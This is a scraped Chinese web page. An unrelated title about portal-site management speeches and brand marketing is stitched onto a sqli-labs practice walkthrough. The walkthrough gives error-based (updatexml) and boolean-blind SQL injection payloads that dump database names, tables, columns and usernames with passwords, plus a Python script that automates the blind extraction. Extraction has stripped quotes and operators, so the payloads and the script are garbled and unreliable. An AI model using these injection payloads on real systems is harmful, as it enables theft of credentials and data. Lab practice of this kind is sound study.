当前位置：首页 > news >正文

在门户网站管理建设工作讲话品牌互动营销案例

news 2025/11/9 17:07:37

在门户网站管理建设工作讲话,品牌互动营销案例,做网站有发展吗,google play商店sqllabs5:(报错注入) ?id1 回显You are in........... ?id2-1 回显You are in........... ?id1 回显 1 LIMIT 0,1 判断是字符型#xff0c;闭合。?id1order by 3-- //页面显示正常我们试了4行得出是报错注入我们先爆库名 http://127.0.0.1/sqli-labs-master/L…sqllabs5:(报错注入) ?id1 回显You are in........... ?id2-1 回显You are in........... ?id1 回显 1 LIMIT 0,1 判断是字符型闭合。?id1order by 3-- //页面显示正常我们试了4行得出是报错注入我们先爆库名 http://127.0.0.1/sqli-labs-master/Less-5/?idand updatexml(1,concat(0x7e,(select database()),0x7e),3)-- 拿下库名:security 爆表名 http://127.0.0.1/sqli-labs-master/Less-5/?id-1%27%20and%20updatexml(1,concat(0x7e,(select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema%27security%27)),1)%20-- 拿下表名然后爆字段 http://127.0.0.1/sqli-labs-master/Less-5/?id-1 and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_nameusers and table_schemasecurity)),1) --爆数据 http://127.0.0.1/sqli-labs-master/Less-5/?id-1 and updatexml(1,concat(0x7e,(select group_concat(username,0x7e,password) from users)),1) -- 数据不完整因为updatexml()函数的报错内容不超过32个字符所以我们还需要对数据进行处理使用substring()函数对结果字符进行处理 ?id-1 and updatexml(1,concat(0x7e,substring((select group_concat(username,0x7e,password) from users),32,64)),1) -- 之后我们就可以不断改变位置这样我们就可以得到所有数据后续的操作不再演示 sqllabs8:布尔盲注报错注入被注释掉了联合查询只出现you are in .......... 所以这里我们能看见一真一假页面特征不加时为真 http://127.0.0.1/sqli-labs-master/Less-8/?id1 加入时为假 http://127.0.0.1/sqli-labs-master/Less-8/?id1 我们可以用布尔盲注我们数据库名 securitys的ascii码是115我们可以一个一个试一试 http://127.0.0.1/sqli-labs-master/Less-8//?id1 and ascii(substring((select database()),1,1))115-- 利用二分法和ASCII码进行渗透根据此现象我们写一个python脚本快速进行注入 import time import requestsurl http://127.0.0.1/sqli-labs-master/Less-8/index.phpdef inject_database(url):name for i in range(1, 50):low 32high 128mid (low high) // 2while low high:payload 1 and ascii(substr(database(), %d, 1)) %d-- % (i, mid)res {id: payload}# start_time time.time()r requests.get(url, paramsres)# end_time time.time()if You are in........... in r.text:low mid 1else:high midmid (low high) // 2if mid 32:breakname name chr(mid)print(name)inject_database(url) 爆库名; 爆表名 payload 1 and ascii(substr((select group_concat(table_name) from information_schema.tables where table_schemadatabase()), %d, 1)) %d-- % (i, mid) 爆列名 payload 1 and ascii(substr((select group_concat(column_name) from information_schema.columns where table_schemadatabase() and table_nameusers), %d, 1)) %d-- % (i, mid) 爆数据 payload 1 and ascii(substr((select group_concat(username,$,password) from users), %d, 1)) %d-- % (i, mid)

查看全文

http://www.dnsts.com.cn/news/159710.html